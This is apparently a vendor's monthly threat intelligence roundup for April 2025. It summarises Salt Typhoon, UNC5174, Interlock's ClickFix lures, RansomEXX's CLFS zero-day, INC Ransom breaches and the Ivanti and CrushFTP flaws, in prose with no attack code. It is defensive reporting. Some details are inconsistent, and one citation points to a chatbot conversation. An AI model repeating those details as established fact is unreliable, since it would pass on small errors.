Interlock’s ClickFix Trick: One Click, Total Data Compromise

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

Top Threat Actors Observed in the Wild: April 2025

Here are the most active threat actors that have been observed in March in the wild.

FBI Calls for Help to Unmask Salt Typhoon – Chinese Telecom Espionage Group

• Victim Location: United States (nationwide telecoms) and global targets across Europe, Africa, and Asia

• Sectors: Telecommunications providers, Internet Service Providers (ISP), government networks (via telecom infrastructure)

• Threat Actor: Salt Typhoon – Chinese state-sponsored cyber-espionage group (aka GhostEmperor, FamousSparrow, UNC2286)​.

• Actor Motivations: Espionage (intelligence collection from communications infrastructure)

• Tools & Techniques: Stolen credentials and living-off-the-land persistence on network devices​; exploitation of Cisco IOS XE router flaws (e.g. CVE-2023-20198, CVE-2023-20273)​; custom malware “JumbledPath” for stealthy traffic monitoring​.

Salt Typhoon has been conducting prolonged intrusions into telecom networks, enabling Beijing-linked hackers to covertly monitor communications on a massive scale. In late 2024 and early 2025, the group breached multiple major U.S. telecom carriers (AT&T, Verizon, Lumen, and others), even accessing a U.S. law enforcement wiretap system and intercepting “private communications” of a few government officials​ [1]. Despite exposure of these activities, Salt Typhoon continued its campaign into 2025: between December 2024 and January 2025 the group compromised additional telecom firms in the U.S., Europe (Italy, UK), Africa (South Africa), and Asia (Thailand) by exploiting known vulnerabilities in Cisco IOS XE network devices. The attackers used a 2018-era Cisco bug (Smart Install exploit) and two 2023 router privilege escalation and command injection flaws to create backdoor accounts and run malicious code on unpatched routers​. 

Once inside, Salt Typhoon operatives showed exceptional persistence, in some cases maintaining covert access for 3+ years in critical networks. They rely on valid credentials and native admin tools (avoiding malware on endpoints) to remain stealthy, but have deployed a bespoke implant called JumbledPath to monitor network traffic and siphon data from compromised telecom equipment​. 

In April, the FBI issued a public PSA seeking information to unmask the individuals behind Salt Typhoon [2], underscoring the campaign’s severity​. U.S. authorities even sanctioned a Chinese tech firm for assisting these intrusions​. Salt Typhoon’s wide-reaching espionage operations highlight the high stakes of unprotected infrastructure – telecom backbones and network gear have become prime targets for state-sponsored hackers intent on wiretapping the world​.

UNC5174: Stealthy Chinese APT Deploys VShell RAT for Defense Sector Spying

• Victim Location: Primarily United States, United Kingdom, Canada; also Asia-Pacific NGOs

• Sectors: Defense contractors, Government agencies, Think tanks, Critical infrastructure (energy, healthcare)​.

• Threat Actor: UNC5174 – Chinese state-sponsored APT (identified by Mandiant; believed to be government contractors)​.

• Actor Motivations: Espionage (stealing defense and policy intelligence)

• Malware & TTPs: Custom backdoors (Snowlight implant [3], Silver malware) plus open-source VShell RAT for command-and-control​; exploitation of known web server vulnerabilities (e.g. F5 BIG-IP and ScreenConnect flaws) for initial access.

UNC5174 is a highly stealthy Chinese espionage group that came to light in April 2025 for its adept use of open-source tools to blend into targets’ networks​. Active through at least April, this group has been targeting Western defense and government organizations – including U.S. military contractors, government agencies, research institutes, and tech companies – as well as NGOs in Asia-Pacific, all aligned with Chinese intelligence priorities ​[4]. Investigations revealed UNC5174 leveraging public hacking frameworks and living-off-the-land techniques to avoid detection. Notably, the group deploys a previously unknown remote access Trojan dubbed VShell, an open-source backdoor similar to Cobalt Strike, as a secondary in-memory implant to maintain persistence on compromised machines​. They pair this with a custom malware family called Snowlight (uncovered by Mandiant) and a “Silver” implant, giving them multiple footholds in victim networks​. 

To gain initial entry, UNC5174 exploits internet-facing applications, for example, reports indicate they targeted unpatched F5 BIG-IP (CVE-2022-1388) and ConnectWise ScreenConnect remote support flaws, allowing them to breach perimeter systems and drop malware [5]​. Once inside, they operate quietly: using legitimate admin tools and scripts (e.g. scheduled tasks, PowerShell) to move laterally and collect data, thereby “blending in” with normal operations​. UNC5174’s activity in April shows a continuation of Chinese cyber-espionage focusing on defense and critical infrastructure. Their use of an open-source RAT and “fileless” malware in memory makes attribution and detection difficult​. Nonetheless, intelligence agencies assess with high confidence that this is a state-backed operation intended to steal sensitive military and policy information, a strategic threat to Western national security​.

Interlock Ransomware: ClickFix Attacks and Healthcare Data Extortion

• Victim Location: United States (notably a Fortune-500 healthcare provider); also targeting organizations in Europe (observed since late 2024)

• Sectors: Healthcare (dialysis clinics), Education and Public Sector (e.g. school systems), Corporates using common IT tools

• Threat Actor: Interlock – Ransomware gang active since Sept 2024 (independent operation with its own leak site, not a RaaS affiliate model)​.

• Actor Motivations: Financial gain (data theft and double-extortion ransomware)

• Techniques & Malware: “ClickFix” social engineering lures (fake IT support pages triggering PowerShell)​; initial payloads installing info-stealers (e.g. LummaStealer, Berserk malware) and a custom Interlock RAT​; lateral movement via RDP and admin tools, followed by Interlock ransomware deployment

Interlock is an emerging ransomware threat group that made headlines in April 2025 for its brazen attack on a major healthcare company and its inventive intrusion technique. On April 12, DaVita Inc., a U.S. kidney dialysis firm, suffered a ransomware attack that disrupted operations​. By April 24, the Interlock gang claimed responsibility, posting DaVita’s name on its dark web leak site and leaking ~1.5 TB of data (including patient records and financial info) after ransom negotiations failed [6]. This incident highlights Interlock’s double-extortion approach: encrypting systems and stealing sensitive data to pressure victims into paying.

Beyond high-profile victims, Interlock has been noted for using a novel social engineering tactic dubbed “ClickFix [7].” In ClickFix attacks, the hackers impersonate IT troubleshooting tools or verification prompts to trick users into executing malicious commands. For example, researchers reported that Interlock set up fake webpages mimicking Microsoft Teams or the popular Advanced IP Scanner utility, which displayed a “Press Fix It to resolve an issue” message. When unwitting users followed the instructions (copy-pasting a provided command into their console), a hidden PowerShell command was run – downloading a 36 MB payload packaged with malware​. The attack is devious: the user sees the legitimate application open (to allay suspicion) while in the background a malicious PowerShell script executes invisibly​. This script establishes persistence (via a Run key) and immediately harvests system information (OS version, running processes, etc.), sending it to Interlock’s command-and-control server. The server can then respond with additional payloads; analysts observed it delivering credential stealers like LummaStealer, keyloggers, and the group’s own lightweight Interlock RAT.

Once the RAT is running, Interlock operators use the foothold to move laterally across the network. They have been seen exploiting stolen credentials and using remote admin tools (RDP, PuTTY, AnyDesk, LogMeIn) to spread to other systems​. Finally, they deploy the file-encrypting ransomware to lock victim data and drop ransom notes. Interlock’s leak site indicates ransom demands ranging from hundreds of thousands up to millions of dollars​. The combination of clever phishing (ClickFix) and traditional post-exploitation techniques makes Interlock a dangerous “mid-tier” ransomware actor to watch. Their attack on a healthcare giant in April also underscores the human cost of such attacks (impacting patient services) and the need for organizations to harden user-awareness and patch management to thwart the initial intrusions.

RansomEXX (Storm-2460) – Ransomware Gang Exploits Windows Zero‑Day

• Victim Location: North & South America, Europe, Middle East (confirmed in USA, Venezuela, Spain, Saudi Arabia).

• Sectors: IT services and Real Estate (U.S.), Financial (Venezuela), Software (Spain), Retail (Saudi)​.

• Threat Actor: RansomEXX – Sophisticated ransomware group (tracked by Microsoft as “Storm-2460”)​

• Actor Motivations: Financial (targeted ransomware extortion)

• Tools & Exploits: PipeMagic backdoor for initial access; Windows Common Log File System (CLFS) zero-day exploit (CVE-2025-29824) for privilege escalation​; RansomEXX ransomware payload for encryption

In April 2025, Microsoft alerted organizations that the RansomEXX ransomware gang had been actively using a Windows zero-day vulnerability to carry out a string of targeted attacks [8]. The flaw in question – CVE-2025-29824 – is a use-after-free bug in the Windows CLFS component that allows a local attacker to elevate privileges to SYSTEM level [9]. RansomEXX operators took advantage of this bug (prior to a patch being available) as part of their attack chain to fully compromise victim machines. Microsoft rushed a fix for CVE-2025-29824 in the April 2025 Patch Tuesday updates and noted that, fortunately, the zero-day had been exploited only in a limited number of attacks in the wild. 

Those attacks, however, were globally distributed and highly targeted. According to Microsoft’s investigation, RansomEXX targeted a diverse set of victims: IT and real estate firms in the United States, a financial institution in Venezuela, a software company in Spain, and a retail business in Saudi Arabia. In each case, the attackers first established access and dropped a custom backdoor (dubbed “PipeMagic”). PipeMagic was then used to deploy the CLFS exploit on the infected system, which in turn allowed the attackers to disable security controls and execute the ransomware with SYSTEM privileges. Once RansomEXX encrypted the files, it left behind its hallmark ransom note (!_READ_ME_REXX2_!.txt) instructing the victim to use a Tor link to contact the attackers​.

One notable detail is that systems running the very latest Windows 11 builds were apparently not affected by the exploit, possibly due to exploit mitigations, whereas older Windows versions were vulnerable​. Microsoft publicly attributed this campaign to the known RansomEXX group (which they track as Storm-2460) and urged all organizations to apply the April patches immediately​. The incident is a textbook example of ransomware actors weaponizing zero-day vulnerabilities. By using an unknown exploit, RansomEXX was able to bypass many defenses (since no antivirus signature or IDS rule existed for the new exploit) and hit high-value targets. This development aligns with a growing trend of ransomware gangs adopting APT-like tactics, employing sophisticated exploits traditionally seen only in nation-state operations. It also reinforces the importance of keeping systems updated – in this case, organizations that delayed patching or ran legacy Windows versions were at much greater risk of compromise.

INC Ransom – New Extortion Group Hits U.S. Retail & Legal Entities

• Victim Location: United States (multiple states)

• Sectors: Retail & Wholesale (grocery chain operations), Legal (state bar association), Healthcare (hospital systems)

• Threat Actor: “INC Ransom” – Emerging ransomware/extortion gang (possibly a rebrand of an existing crew, referenced by Microsoft as part of “Vanilla Tempest”)​

• Actor Motivations: Financial (data theft and extortion, double-extortion attacks)

• Modus Operandi: Data breaches followed by public leak site disclosure; focus on U.S. targets in 2024–2025; opportunistic exploitation of unpatched systems and third-party compromises (investigations ongoing)

INC Ransom gained notoriety in April 2025 through a series of brazen data breach disclosures. One of the group’s highest-profile victims is Ahold Delhaize, a global food retail giant (owner of Food Lion, Stop & Shop, Giant, etc.). Ahold Delhaize suffered a cyber incident in November 2024 that forced some IT systems offline​ [10]. At the time, the company did not confirm ransomware involvement. However, on April 16, 2025, INC Ransom added Ahold Delhaize to its dark web leak portal, posting samples of documents allegedly stolen from the company. In response, Ahold Delhaize publicly confirmed that certain files had been taken from its U.S. systems during the November attack (i.e. a data breach did occur)​. The leaked data is believed to include internal business records, though the full impact (e.g. customer data exposure) was still under investigation [10]​. The incident shows INC Ransom’s willingness to target large enterprises and sit on exfiltrated data for months, only to use it later for extortion once they establish their leak site.

Although not occurring in April, the State Bar of Texas reported unauthorized access to its network during Q1 2025, specifically between January 28 and February 9, with the breach discovered on February 12 [11]. The Bar notified its approximately 100,000 members that hackers—identified as INC Ransom—had breached their systems and stolen sensitive personal data [12]. This suggests the group’s focus on U.S. entities spans multiple industries, having already impacted retail, legal, and, according to other reports, healthcare as well. Microsoft’s security teams have been tracking an INC Ransom affiliate under the codename “Vanilla Tempest,” noting that this actor has recently launched aggressive attacks on U.S. healthcare providers. It’s possible that INC Ransom is a spin-off or rebranding of a previously known ransomware group that has shifted its tactics. The group’s leak site and extortion methods resemble those of other gangs, but definitive attribution is still under investigation.

Organizations in the U.S. are advised to stay vigilant, as INC Ransom has been targeting entities with potentially weaker cybersecurity, and then leveraging the publicity of leak sites to maximize pressure. Proactive threat hunting, network monitoring, and prompt breach disclosure (when incidents occur) can help mitigate the impact of such extortion attempts.

Latest Vulnerabilities and Exploits in April 2025

In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.

Ivanti Zero-Day (CVE-2025-22457) – VPN Appliance Exploited by Chinese APT

• Affected Vendor/Product: Ivanti (formerly Pulse Secure) – Connect Secure VPN appliances (versions 9.x and 22.7R2.5 and earlier)

• Vulnerability: A critical buffer overflow in the VPN web interface enables unauthenticated remote code execution.

• Discovery/Exploitation: Publicly disclosed on April 3, 2025; actively exploited since mid-March by a suspected Chinese state-aligned group tracked as UNC5221.

• Patch & Mitigation: Ivanti released a patch in version 22.7R2.6 on February 11, 2025. CISA and Ivanti have issued urgent advisories recommending immediate upgrades due to confirmed in-the-wild exploitation.

A critical zero-day in Ivanti’s VPN platform emerged as one of the most alarming exploits in early April. CVE-2025-22457 is a buffer overflow vulnerability in Ivanti Connect Secure (ICS) appliances, which provide remote access into corporate networks. Initially misclassified as a denial-of-service issue, the flaw was later found to allow full remote code execution. Threat actors reverse-engineered Ivanti’s February patch and began weaponizing the vulnerability on unpatched devices.

By mid-March, a Chinese APT group known as UNC5221 had begun exploiting the flaw in the wild, targeting vulnerable VPN gateways to deploy malware [13]. Researchers observed UNC5221 using the exploit to drop TRAILBLAZE (an in-memory dropper) and BRUSHFIRE (a stealth backdoor) onto compromised VPN appliances. The presence of SPAWN malware components—previously attributed to UNC5221—further confirmed the group’s involvement. Once the VPN appliance was backdoored, the attackers were able to pivot into internal networks, effectively bypassing perimeter defenses.

Ivanti quickly acknowledged the severity of the threat. On April 3, Ivanti published an official advisory, and CISA added CVE-2025-22457 to its Known Exploited Vulnerabilities (KEV) catalog, mandating remediation for federal agencies.

This case underscores a key lesson: even when a vulnerability is initially downplayed, attackers may still find ways to exploit it. Organizations using ICS appliances should ensure they have upgraded to version 22.7R2.6 or later and conduct thorough reviews of VPN logs for suspicious activity dating back to February or March. Since exploitation began before public disclosure, any delay in patching could leave systems exposed to highly capable threat actors. Thanks to prompt disclosure, the flaw’s inclusion in CISA’s KEV catalog likely helped prevent broader impact.

CrushFTP Critical Flaw (CVE-2025-31161) – Authentication Bypass Abused

• Affected Product: CrushFTP (enterprise file transfer server software): versions prior to 10.8.4 and 11.3.1

• Vulnerability: An authentication bypass flaw in CrushFTP’s HTTP authorization handling allows unauthenticated attackers to impersonate any known user, such as the default "crushadmin" account, without credentials. This effectively gives full control of the server to the attacker.

• Exploitation: Active exploitation was confirmed in the wild as early as March 30, 2025. By April 7, the vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. At least 1,500 internet-exposed instances were reported vulnerable, underscoring the urgency of mitigation.

• Patch: CrushFTP released fixes in versions 10.8.4 and 11.3.1. All administrators should upgrade immediately. As a temporary mitigation, ensure management interfaces are not exposed to the internet or are protected by network ACLs.

A newly disclosed vulnerability in CrushFTP, a widely used enterprise file transfer server, was quickly weaponized by attackers in early April. CVE-2025-31161 is an authentication bypass flaw with a CVSS score of 9.8. By crafting a specific HTTP header, an attacker can trick the server into treating them as an authenticated admin user, allowing them to gain full access without valid credentials. This includes the ability to upload/download files, create new accounts, and possibly execute arbitrary code, depending on server configuration.

Following public disclosure, reports of exploitation began surfacing rapidly. Security researchers observed attackers deploying tools like MeshCentral and AnyDesk, creating persistent backdoor accounts, and even dropping malware to maintain long-term access. The scope of potential victims includes businesses, educational institutions, and possibly government agencies.

This incident highlights the high risk posed by vulnerabilities in file transfer software, which often handles sensitive data and sits at critical points in enterprise infrastructure. Organizations using CrushFTP should patch immediately and audit logs for any unusual access patterns, especially admin logins from unfamiliar IPs, dating back to late March. Admin interfaces should also be placed behind VPNs or firewalls to prevent direct exposure.

References

[1] S. Özeren, “Salt Typhoon: A Persistent Threat to Global Telecommunications Infrastructure,” Dec. 20, 2024. Available: https://www.picussecurity.com/resource/blog/salt-typhoon-telecommunications-threat. [Accessed: Apr. 30, 2025]

[2] S. Gatlan, “FBI seeks help to unmask Salt Typhoon hackers behind telecom breaches,” BleepingComputer, Apr. 25, 2025. Available: https://www.bleepingcomputer.com/news/security/fbi-seeks-help-to-unmask-salt-typhoon-hackers-behind-telecom-breaches/. [Accessed: Apr. 28, 2025]

[3] T. Meskauskas, “SNOWLIGHT Malware (Mac),” Apr. 16, 2025. Available: https://www.pcrisk.com/removal-guides/32658-snowlight-malware-mac. [Accessed: Apr. 30, 2025]

[4] Cybersecurity Help s.r.o, “China-linked UNC5174 group resurfaces with sophisticated Linux malware campaign.” Available: https://www.cybersecurity-help.cz/blog/4682.html. [Accessed: Apr. 30, 2025]

[5] D. B. Johnson, “Chinese espionage group leans on open-source tools to mask intrusions,” CyberScoop, Apr. 15, 2025. Available: http://cyberscoop.com/chinese-espionage-group-unc5174-open-source-tools/. [Accessed: Apr. 30, 2025]

[6] A. Doyle, “Interlock Ransomware Gang Claims DaVita Cyberattack, Leaks 1.5TB of Stolen Data,” Daily Security Review, Apr. 25, 2025. Available: https://dailysecurityreview.com/security-spotlight/interlock-ransomware-gang-claims-davita-cyberattack-leaks-1-5tb-of-stolen-data/. [Accessed: Apr. 30, 2025]

[7] L. French, “Interlock ransomware evolves tactics with ClickFix, infostealers,” SC Media, Apr. 16, 2025. Available: https://www.scworld.com/news/interlock-ransomware-evolves-tactics-with-clickfix-infostealers. [Accessed: Apr. 30, 2025]

[8] “Website.” Available: https://chatgpt.com/c/6811be8d-73ec-800c-9114-bca9054660d0

[9] D. Jones, “Windows CLFS zero-day exploited in ransomware attacks,” Cybersecurity Dive, Apr. 09, 2025. Available: https://www.cybersecuritydive.com/news/windows-clfs-zero-day-exploited-ransomware/744878/. [Accessed: Apr. 30, 2025]

[10] S. Fadilpašić, “Food retail giant behind several major US supermarket brands confirms data stolen in major ransomware breach,” TechRadar pro, Apr. 18, 2025. Available: https://www.techradar.com/pro/security/food-retail-giant-behind-several-major-us-supermarket-brands-confirms-data-stolen-in-major-ransomware-breach. [Accessed: Apr. 30, 2025]

[11] B. Toulas, “Texas State Bar warns of data breach after INC ransomware claims attack,” BleepingComputer, Apr. 03, 2025. Available: https://www.bleepingcomputer.com/news/security/texas-state-bar-warns-of-data-breach-after-inc-ransomware-claims-attack/. [Accessed: Apr. 30, 2025]

[12] P. Bischoff, “Texas State Bar data breach leaks SSNs and financial info; ransomware gang claims responsibility,” Comparitech, Apr. 03, 2025. Available: https://www.comparitech.com/news/texas-state-bar-data-breach-leaks-ssns-and-financial-info-ransomware-gang-claims-responsibility/. [Accessed: Apr. 30, 2025]

[13] S. Özeren, “UNC5221’s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure,” Apr. 17, 2025. Available: https://www.picussecurity.com/resource/blog/unc5221-cve-2025-22457-ivanti-connect-secure. [Accessed: Apr. 30, 2025]